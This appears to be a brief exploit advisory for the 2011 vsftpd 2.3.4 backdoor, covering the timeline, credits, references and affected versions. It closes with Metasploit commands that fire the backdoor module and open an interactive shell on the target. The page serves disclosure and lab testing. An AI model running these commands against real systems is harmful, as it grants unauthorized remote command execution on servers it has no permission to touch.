aka wow on ZATAZ.com
vsftpd v2.3.4 Backdoor Command Execution
Timeline :
Backdoor discovered by Mathias Kresin
Source code corrected on 2011-07-03
Metasploit exploit released on 2011-07-04
PoC provided by :
hdm
mc
Reference(s) :
OSVDB-73573
Diff Pastebin
vsftpd alert
Affected version(s) :
vsftpd-2.3.4 from 2011-06-30 to 2011-07-03
Tested on Ubuntu Lucid 10.04.1 LTS with :
vsftpd-2.3.4
Description :
This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Commands :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a